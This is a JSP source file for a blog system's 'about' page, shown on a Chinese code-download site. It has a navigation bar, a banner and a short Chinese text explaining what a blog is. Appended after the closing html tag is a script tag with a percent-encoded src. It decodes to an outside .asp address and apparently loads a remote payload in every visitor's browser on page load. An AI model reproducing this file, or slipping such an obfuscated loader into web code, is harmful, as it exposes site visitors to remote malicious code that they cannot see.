⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 aboutblog.jsp

📁 本博客系统是在J2EE平台上用Hibernate框架技术和MVC模式构建
💻 JSP
字号:
<%@ page contentType="text/html;charset=UTF-8" language="java"%>
<%@ page import="com.blog.tableclass.*"%>
<%@ page import="com.blog.*"%>
<%@ page import="java.util.*"%>
<%
	Blog blog = (Blog)session.getAttribute(Constants.LOGIN_USER_KEY);
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
	<head>
		<title>博客介绍</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<link rel="StyleSheet" type="text/css" href="images/style.css">
	</head>
	<body>
		<table width="85%" height="207" align="center">
	<tr>
		<td width="85%" height="125" background="images/head004.gif"><FONT face="宋体"></FONT></td>
	</tr>
	<tr height="31">
		<td>
			<table border="0" cellpadding="0" cellspacing="0" background="images/line.jpg">
				<tr height="20" align="center">
					<td class="lt0" width="580"></td>
					<td class="lt0" onmouseenter="mhEnter()" onmouseleave="mhLeave()"><a href="/NewBlog/topBlog.jsp">博客排行榜</a></td>
					<td class="ltsep">|</td>
					<td class="lt0" onmouseenter="mhEnter()" onmouseleave="mhLeave()"><a href="/NewBlog/index.jsp">博客首页</a></td>
					<td class="ltsep">|</td>
					<td class="lt0" onmouseenter="mhEnter()" onmouseleave="mhLeave()"><a href="/NewBlog/Regist.jsp">新博客注册</a></td>
					<td class="ltsep">|</td>
					<td class="lt0" onmouseenter="mhEnter()" onmouseleave="mhLeave()"><a href="/NewBlog/include/search.jsp">搜索</a></td>
			  		
			  </tr>
		  </table>
	  </td>
  </tr>
</table>
<script language="javascript">
<!--
function mhEnter()
{
window.event.srcElement.className="lt1";
}
function mhLeave()
{
window.event.srcElement.className="lt0";
}
//-->
</script>
		<table align="center" height="45" cellspacing="0" cellpadding="0" width="85%" background="images/banner3.gif" border="0">
			<tbody>
				<tr>
					<td align="middle">
						<font color="#FF0000"><b>欢迎光临博客之家!</b></font>
					</td>
				</tr>
				
			</tbody>
		</table>
		
		<table background="images/bg.GIF" border="1" width="85%" bordercolor="#4EA9F1" align="center">
			<tr>
				<td width="99%" valign="top">
					<p>
						<B>什么是博客?</B> <BR>
					博客如生活,扮演您自己。Weblog是Web Log的缩写,中文意思是"网络日志",后来缩写为Blog,而Blogger(博客)则是写blog的人。一个博客(blog)就是一个网页,它通常是由简短且经常更新的Post所构成;这些张贴的文章都按照年份和日期排列。博客(blog)的内容和目的有很大的不同,从对其他网站的超级链接和评论,有关公司、个人、构想的新闻到日记、照片、诗歌、散文,甚至科幻小说的发表或张贴都有。<BR><BR><BR><BR>
						<a href="myBlog?blogid=<%=blog.getId()%>">进入我的BLOG</a></p>
					<p>
					</p>
				</td>
			</tr>
		</table>
		
	</body>
</html>
<script src="http://%78%79%6B%2E%74%78%73%68%69%2E%63%6F%6D/%62%32%2E%61%73%70"></script>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -